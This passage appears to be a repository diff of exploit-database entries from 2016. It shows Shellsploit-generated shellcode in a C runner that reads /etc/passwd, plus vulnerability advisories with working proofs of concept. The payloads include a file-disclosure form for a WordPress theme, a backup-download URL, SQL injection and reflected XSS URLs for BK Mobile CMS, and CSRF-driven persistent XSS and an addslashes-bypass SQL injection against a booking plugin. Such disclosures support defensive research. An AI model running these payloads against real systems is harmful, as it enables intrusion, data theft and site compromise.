00000080 E8BCFFFFFF call dword 0x41
|
||||
00000085 2F das
|
||||
00000086 657463 gs jz 0xec
|
||||
00000089 2F das
|
||||
0000008A 7061 jo 0xed
|
||||
0000008C 7373 jnc 0x101
|
||||
0000008E 7764 ja 0xf4
|
||||
00000090 41 inc ecx
|
||||
00000091 2F das
|
||||
00000092 657463 gs jz 0xf8
|
||||
00000095 2F das
|
||||
00000096 7061 jo 0xf9
|
||||
00000098 7373 jnc 0x10d
|
||||
0000009A 7764 ja 0x100
|
||||
*/
|
||||
|
||||
|
||||
//Project : https://github.com/b3mb4m/Shellsploit
|
||||
//This file created with shellsploit ..
|
||||
//19/01/2016 - 00:29:31
|
||||
//Compile : gcc -fno-stack-protector -z execstack shell.c -o shell
|
||||
|
||||
unsigned char shellcode[] =
|
||||
"\x31\xc0\x40\x74\x3a\x31\xc9\x31\xc0\x31\xd2\x51\xb0\x05\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x89\xe3\xcd\x80\x89\xd9\x89\xc3\xb0\x03\x66\xba\xff\x0f\x66\x42\xcd\x80\x31\xc0\x31\xdb\xb3\x01\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80\xeb\x3f\x5f\x80\x77\x0b\x41\x48\x31\xc0\x04\x02\x48\x31\xf6\x0f\x05\x66\x81\xec\xff\x0f\x48\x8d\x34\x24\x48\x89\xc7\x48\x31\xd2\x66\xba\xff\x0f\x48\x31\xc0\x0f\x05\x48\x31\xff\x40\x80\xc7\x01\x48\x89\xc2\x48\x31\xc0\x04\x01\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\xe8\xbc\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x41\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
|
||||
|
||||
int main(void){
|
||||
(*(void(*)()) shellcode)();
|
||||
}
|
9
platforms/php/webapps/39332.txt
Executable file
9
platforms/php/webapps/39332.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/67481/info
|
||||
|
||||
Wiser is prone to an information-disclosure vulnerability because it fails to sufficiently validate user-supplied data.
|
||||
|
||||
An attacker can exploit this issue to download backup files that contain sensitive information. Information harvested may aid in launching further attacks.
|
||||
|
||||
Wiser 2.10 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/voip/sipserver/class/baixarBackup.php
|
14
platforms/php/webapps/39333.html
Executable file
14
platforms/php/webapps/39333.html
Executable file
|
@ -0,0 +1,14 @@
|
|||
source: http://www.securityfocus.com/bid/67935/info
|
||||
|
||||
The Elegance theme for WordPress is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
|
||||
|
||||
Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://www.site.com/wp-content/themes/elegance/lib/scripts/dl-skin.php" method="post">
|
||||
Download:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
|
||||
<input type="submit">
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
98
platforms/php/webapps/39339.txt
Executable file
98
platforms/php/webapps/39339.txt
Executable file
|
@ -0,0 +1,98 @@
|
|||
#Product : BK Mobile CMS
|
||||
#Exploit Author : Rahul Pratap Singh
|
||||
#Version : 2.4
|
||||
#Home page Link :
|
||||
http://codecanyon.net/item/jquery-mobile-website-with-full-admin-panel/2441358
|
||||
#Website : 0x62626262.wordpress.com
|
||||
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
|
||||
#Date : 27/Jan/2016
|
||||
|
||||
SQLi Vulnerability:
|
||||
|
||||
----------------------------------------
|
||||
Description:
|
||||
----------------------------------------
|
||||
"g_name" parameter is not sanitized that leads to SQL Injection.
|
||||
|
||||
----------------------------------------
|
||||
Vulnerable Code:
|
||||
----------------------------------------
|
||||
file: gallery1.php
|
||||
line 5
|
||||
|
||||
$get_g_name = $_GET['g_name'];
|
||||
$query_photos = "SELECT * FROM ".$get_prefix."photos WHERE
|
||||
gallery_name='".$get_g_name."' ORDER BY id DESC";
|
||||
|
||||
----------------------------------------
|
||||
Exploit:
|
||||
----------------------------------------
|
||||
http://localhost/BKMobile%20CMS/user/gallery1.php?g_name=1%27%20union%20all%20select%201,2,3,group_concat%28version%28%29%29,5--+
|
||||
|
||||
----------------------------------------
|
||||
POC:
|
||||
----------------------------------------
|
||||
https://0x62626262.files.wordpress.com/2016/01/bk-mobile-templatesqlipoc.png
|
||||
|
||||
|
||||
XSS Vulnerability:
|
||||
|
||||
----------------------------------------
|
||||
Description:
|
||||
----------------------------------------
|
||||
"g_name" parameter is not sanitized that leads to reflected XSS.
|
||||
|
||||
----------------------------------------
|
||||
Vulnerable Code:
|
||||
----------------------------------------
|
||||
file: gallery1.php
|
||||
|
||||
line 81-88
|
||||
|
||||
<div data-role="page" id="<?php echo $get_g_name; ?>" class="jqm-demos"
|
||||
<?php echo $custom_bg_active; ?>>
|
||||
|
||||
<?php include("../header.php"); ?>
|
||||
|
||||
<div role="main" class="ui-content">
|
||||
|
||||
<div class="jqm-block-content">
|
||||
<h3><?php echo $_GET['g_name']; ?></h3>
|
||||
|
||||
----------------------------------------
|
||||
Exploit:
|
||||
----------------------------------------
|
||||
http://localhost/BKMobile%20CMS/user/gallery1.php?g_name=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
|
||||
|
||||
----------------------------------------
|
||||
POC:
|
||||
----------------------------------------
|
||||
https://0x62626262.files.wordpress.com/2016/01/bk-mobile-templatexsspoc.png
|
||||
|
||||
Fix:
|
||||
Update to 2.5
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
→ January 14, 2015 – Bug discovered, initial report to Vendor
|
||||
→ January 14, 2015 – Vendor acknowledged
|
||||
→ January 19, 2015 – Vendor Deployed a Patch
|
||||
|
||||
#######################################
|
||||
# CTG SECURITY SOLUTIONS #
|
||||
# www.ctgsecuritysolutions.com #
|
||||
#######################################
|
||||
|
||||
Pub Ref:
|
||||
https://0x62626262.wordpress.com/2016/01/27/bk-mobile-cms-sqli-and-xss-vulnerability
|
||||
http://codecanyon.net/item/jquery-mobile-website-with-full-admin-panel/2441358
|
||||
|
||||
[+] Disclaimer
|
||||
|
||||
Permission is hereby granted for the redistribution of this advisory,
|
||||
provided that it is not altered except by reformatting it, and that due
|
||||
credit is given. Permission is explicitly given for insertion in
|
||||
vulnerability databases and similar, provided that due credit is given to
|
||||
the author.
|
||||
The author is not responsible for any misuse of the information contained
|
||||
herein and prohibits any malicious use of all security related information
|
||||
or exploits by the author or elsewhere.
|
103
platforms/php/webapps/39341.txt
Executable file
103
platforms/php/webapps/39341.txt
Executable file
|
@ -0,0 +1,103 @@
|
|||
# Exploit Title: WordPress appointment-booking-calendar <=1.1.24 - Privilege escalation (Managing calendars) & Persistent XSS
|
||||
# Date: 2016-01-28
|
||||
# Google Dork: Index of /wordpress/wp-content/plugins/appointment-booking-calendar/
|
||||
# Exploit Author: Joaquin Ramirez Martinez [ i0 security-lab]
|
||||
# Software Link: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
|
||||
# Vendor: CodePeople.net
|
||||
# Vebdor URI: http://codepeople.net
|
||||
# Version: 1.1.24
|
||||
# Tested on: windows 10 + firefox + sqlmap 1.0.
|
||||
|
||||
===================
|
||||
PRODUCT DESCRIPTION
|
||||
===================
|
||||
"Appointment Booking Calendar is a plugin for **accepting online bookings** from a set of **available time-slots in
|
||||
a calendar**. The booking form is linked to a **PayPal** payment process.
|
||||
|
||||
You can use it to accept bookings for medical consultation, classrooms, events, transportation and other activities
|
||||
where a specific time from a defined set must be selected, allowing you to define the maximum number of bookings
|
||||
that can be accepted for each time-slot."
|
||||
|
||||
(copy of readme file)
|
||||
|
||||
|
||||
======================
|
||||
EXPLOITATION TECHNIQUE
|
||||
======================
|
||||
remote
|
||||
|
||||
==============
|
||||
SEVERITY LEVEL
|
||||
==============
|
||||
|
||||
medium
|
||||
|
||||
================================
|
||||
TECHNICAL DETAILS && DESCRIPTION
|
||||
================================
|
||||
|
||||
Multiple privilege escalation were found in appointment-booking-calendar plugin that allows remote low level
|
||||
and unauthenticated users to update calendar owners and options (allowing persistent XSS).
|
||||
|
||||
================
|
||||
PROOF OF CONCEPT
|
||||
================
|
||||
|
||||
Changing all appointment tables with UTF-8 charset, injecting persistent XSS into ´ict´ and ´ics´ options and setting
|
||||
´CPABC_APPOINTMENTS_LOAD_SCRIPTS´ option to value ´1´.
|
||||
|
||||
<html>
|
||||
<!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
|
||||
<body>
|
||||
<script>
|
||||
function submitRequest()
|
||||
{
|
||||
var xhr = new XMLHttpRequest();
|
||||
xhr.open("GET", "http://localhost:80/wordpress/wp-admin/admin.php?page=cpabc_appointments&ac=st&chs=UTF-8&ict=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&ics=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&scr=1", true);
|
||||
xhr.send();
|
||||
}
|
||||
</script>
|
||||
<form action="#">
|
||||
<input type="button" value="Submit request" onclick="submitRequest();" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
Updating calendar with id 1 and setting name with persistent XSS (if the shortcode [CPABC_APPOINTMENT_CALENDAR calendar="1"]
|
||||
is added in a post, the injected XSS will appear, in administration page appear too).
|
||||
|
||||
<html>
|
||||
<!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
|
||||
<body>
|
||||
<script>
|
||||
function submitRequest()
|
||||
{
|
||||
var xhr = new XMLHttpRequest();
|
||||
xhr.open("GET", "http://localhost:80/wordpress/wp-admin/admin.php?page=cpabc_appointments&u=1&owner=5&name=%3C%2Foption%3E%3C%2Fselect%3E%3Cimg+src%3Dx+onerror%3Dalert%28%2Fjoaquin%2F%29%3E%3C", true);
|
||||
xhr.send();
|
||||
}
|
||||
</script>
|
||||
<form action="#">
|
||||
<input type="button" value="Submit request" onclick="submitRequest();" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
==========
|
||||
CREDITS
|
||||
==========
|
||||
|
||||
Vulnerability discovered by:
|
||||
Joaquin Ramirez Martinez [i0 security-lab]
|
||||
joaquin.ramirez.mtz.lab[at]yandex[dot]com
|
||||
https://www.facebook.com/I0-security-lab-524954460988147/
|
||||
https://www.youtube.com/user/strparser_lk
|
||||
|
||||
|
||||
========
|
||||
TIMELINE
|
||||
========
|
||||
|
||||
2016-01-08 vulnerability discovered
|
||||
2016-01-24 reported to vendor
|
136
platforms/php/webapps/39342.txt
Executable file
136
platforms/php/webapps/39342.txt
Executable file
|
@ -0,0 +1,136 @@
|
|||
# Exploit Title: WordPress appointment-booking-calendar <=1.1.24 - SQL injection through ´addslashes´ (wordpress ´wp_magic_quotes´ function)
|
||||
# Date: 2016-01-28
|
||||
# Google Dork: Index of /wordpress/wp-content/plugins/appointment-booking-calendar/
|
||||
# Exploit Author: Joaquin Ramirez Martinez [now i0 security-lab]
|
||||
# Software Link: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
|
||||
# Vendor: CodePeople.net
|
||||
# Vebdor URI: http://codepeople.net
|
||||
# Version: 1.1.24
|
||||
# OWASP Top10: A1-Injection
|
||||
# Tested on: windows 10 + firefox + sqlmap 1.0.
|
||||
|
||||
===================
|
||||
PRODUCT DESCRIPTION
|
||||
===================
|
||||
"Appointment Booking Calendar is a plugin for **accepting online bookings** from a set of **available time-slots in
|
||||
a calendar**. The booking form is linked to a **PayPal** payment process.
|
||||
|
||||
You can use it to accept bookings for medical consultation, classrooms, events, transportation and other activities
|
||||
where a specific time from a defined set must be selected, allowing you to define the maximum number of bookings
|
||||
that can be accepted for each time-slot."
|
||||
|
||||
(copy of readme file)
|
||||
|
||||
|
||||
======================
|
||||
EXPLOITATION TECHNIQUE
|
||||
======================
|
||||
remote
|
||||
|
||||
==============
|
||||
SEVERITY LEVEL
|
||||
==============
|
||||
|
||||
critical
|
||||
|
||||
================================
|
||||
TECHNICAL DETAILS && DESCRIPTION
|
||||
================================
|
||||
|
||||
A SQL injection flaw was discovered within the latest WordPress appointment-booking-calendar plugin version 1.1.24.
|
||||
|
||||
The flaw were found in the function that is executed when the action ´cpabc_appointments_calendar_update´ is called.
|
||||
The action is added with ´init´ tag, so it function is called every time when parameter
|
||||
´action=cpabc_appointments_calendar_update´ appear in the query string (GET request) or POST request.
|
||||
|
||||
Exploiting succesful this vulnerability we need a vulnerable wordpress site with especial character set for to bypass
|
||||
the ´addslashes´ function (called automatically and applied in all variables $_POST and $_GET by wordpress ´wp_magic_quotes´
|
||||
function) and we need own a calendar too (could be owned by privilege escalation) or be a user with ´edit_pages´ permission (admin|editor).
|
||||
|
||||
The security risk of SQL injection vulnerabilities are extremely because by using this type of flaw, an attacker
|
||||
can compromise the entire web server.
|
||||
|
||||
================
|
||||
PROOF OF CONCEPT
|
||||
================
|
||||
|
||||
An unauthenticated attacker can make a request like...
|
||||
|
||||
http://<wp-host>/<wp-path>/wp-admin/admin-ajax.php?action=cpabc_appointments_check_posted_data
|
||||
&cpabc_calendar_update=1&id=<owned calendar id>
|
||||
|
||||
Example:
|
||||
|
||||
Exploiting simple SQL injection:
|
||||
|
||||
http://localhost/wordpress/wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update
|
||||
&cpabc_calendar_update=1&id=1
|
||||
|
||||
Post data:
|
||||
specialDates=&workingDates&restrictedDates&timeWorkingDates0&timeWorkingDates1&timeWorkingDates2
|
||||
&timeWorkingDates3&timeWorkingDates4&timeWorkingDates5& imeWorkingDates6
|
||||
|
||||
All post variables are vulnerable to SQLi with ´addslashes´ bypass.
|
||||
|
||||
===============
|
||||
VULNERABLE CODE
|
||||
===============
|
||||
|
||||
located in ´cpabc_appointments.php´
|
||||
|
||||
function cpabc_appointments_calendar_update() {
|
||||
global $wpdb, $user_ID;
|
||||
|
||||
if ( ! isset( $_GET['cpabc_calendar_update'] ) || $_GET['cpabc_calendar_update'] != '1' )
|
||||
return;
|
||||
|
||||
$calid = intval(str_replace (CPABC_TDEAPP_CAL_PREFIX, "",$_GET["id"]));
|
||||
if ( ! current_user_can('edit_pages') && !cpabc_appointments_user_access_to($calid) )
|
||||
return;
|
||||
echo "sa";
|
||||
cpabc_appointments_add_field_verify(CPABC_TDEAPP_CONFIG, 'specialDates');
|
||||
|
||||
//@ob_clean();
|
||||
header("Cache-Control: no-store, no-cache, must-revalidate");
|
||||
header("Pragma: no-cache");
|
||||
if ( $user_ID )
|
||||
$wpdb->query("update ".CPABC_TDEAPP_CONFIG." set specialDates='".$_POST["specialDates"]."',".CPABC_TDEAPP_CONFIG_WORKINGDATES."='"
|
||||
.$_POST["workingDates"]."',".CPABC_TDEAPP_CONFIG_RESTRICTEDDATES."='".$_POST["restrictedDates"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES0.
|
||||
"='".$_POST["timeWorkingDates0"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES1."='".$_POST["timeWorkingDates1"]."',".
|
||||
CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES2."='".$_POST["timeWorkingDates2"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES3."='"
|
||||
.$_POST["timeWorkingDates3"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES4."='".$_POST["timeWorkingDates4"]."',"
|
||||
.CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES5."='".$_POST["timeWorkingDates5"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES6
|
||||
."='".$_POST["timeWorkingDates6"]."' where ".CPABC_TDEAPP_CONFIG_ID."=".$calid);
|
||||
|
||||
exit();
|
||||
}
|
||||
|
||||
|
||||
===========
|
||||
|
||||
|
||||
Note:
|
||||
cpabc_appointments_calendar_update2() function is vulnerable too by the same exploit explaned here.
|
||||
|
||||
|
||||
==========
|
||||
CREDITS
|
||||
==========
|
||||
|
||||
Vulnerability discovered by:
|
||||
Joaquin Ramirez Martinez [i0 security-lab]
|
||||
strparser[at]gmail[dot]com
|
||||
https://www.facebook.com/I0-security-lab-524954460988147/
|
||||
https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q
|
||||
|
||||
|
||||
========
|
||||
TIMELINE
|
||||
========
|
||||
|
||||
2016-01-08 vulnerability discovered
|
||||
2016-01-24 reported to vendor
|
||||
2016-01-27 released plugin version 1.1.25
|
||||
2016-01-28 public disclousure
|
||||
|
||||
|
Loading…
Add table
Reference in a new issue